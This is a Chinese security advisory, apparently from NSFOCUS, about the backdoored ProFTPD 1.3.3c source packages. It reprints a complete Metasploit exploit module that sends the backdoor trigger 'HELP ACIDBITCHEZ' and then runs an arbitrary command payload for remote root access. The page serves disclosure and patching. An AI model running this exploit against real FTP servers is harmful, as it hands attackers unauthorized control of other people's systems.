首页 -> 安全研究

安全研究

安全漏洞
ProFTPD受控制源软件包后门安全漏洞

发布日期:2010-12-02
更新日期:2010-12-03

受影响系统:
ProFTPD Project ProFTPD 1.3.x
描述:
BUGTRAQ  ID: 45150

ProFTPD是一款开放源代码FTP服务程序。

ProFTPD的特定时期版本被插入了后门代码,远程攻击者可利用这些后门非授权获取对FTP服务器的访问,从而控制系统。

此问题影响项目的主FTP服务器和所有镜像服务器发布的被攻击的ProFTPD 1.3.3c源代码包,此代码包中包含允许远程root权限访问的后门。2010年11月28日至12月2日期间下载的源代码受此问题影响。

<*来源:Daniel Austin
  
  链接:http://osvdb.org/show/osvdb/69562
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

##
# $Id: proftpd_133c_backdoor.rb 11214 2010-12-03 12:34:38Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::Ftp

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'ProFTPD-1.3.3c Backdoor Command Execution',
            'Description'    => %q{
                    This module exploits a malicious backdoor that was added to the
                ProFTPD download archive. This backdoor was present in the proftpd-1.3.3c.tar.[bz2|gz]
                archive between November 28th 2010 and 2nd December 2010.
            },
            'Author'         => [ 'MC', 'darkharper2' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 11214 $',
            'References'     =>
                [
                    [ 'OSVDB', '69562'],
                    [ 'BID', '45150' ],
                    [ 'URL', 'http://sourceforge.net/mailarchive/message.php?msg_name=alpine.DEB.2.00.1012011542220.12930%40familiar.castaglia.org' ],
                ],
            'Privileged'     => true,
            'Platform'       => [ 'unix' ],
            'Arch'           => ARCH_CMD,
            'Payload'        =>
                {
                    'Space'    => 2000,
                    'BadChars' => '',
                    'DisableNops' => true,
                    'Compat'      =>
                        {
                            'PayloadType' => 'cmd',
                            'RequiredCmd' => 'generic perl telnet',
                        }
                },
            'Targets'        =>
                [
                    [ 'Automatic', { } ],
                ],
            'DisclosureDate' => 'Dec 2 2010',
            'DefaultTarget' => 0))

        deregister_options('FTPUSER', 'FTPPASS')
    end

    def exploit

        connect

        print_status("Sending Backdoor Command")
        sock.put("HELP ACIDBITCHEZ\r\n")

        res = sock.get_once(-1,10)
    
        if ( res and res =~ /502/ )
            print_error("Not backdoored")
        else
            sock.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")
            handler
        end

        disconnect

    end

end

建议:
厂商补丁:

ProFTPD Project
---------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.proftpd.org/

浏览次数:5165
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障